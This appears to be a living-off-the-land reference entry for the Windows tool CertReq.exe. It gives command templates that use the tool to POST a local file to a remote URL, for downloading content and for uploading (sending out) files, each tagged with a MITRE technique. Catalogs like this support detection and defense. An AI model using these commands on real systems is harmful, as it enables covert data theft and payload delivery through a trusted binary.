CertReq.exe

Used for requesting and managing certificates

Download

Download file from Internet

CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} {PATH:.txt}

Send the specified file (penultimate argument) to the specified URL via HTTP POST and save the response to the specified txt file (last argument). — MITRE: T1105 — Privileges: User

Upload

Upload

CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE}

Send the specified file (last argument) to the specified URL via HTTP POST and show response in terminal. — MITRE: T1105 — Privileges: User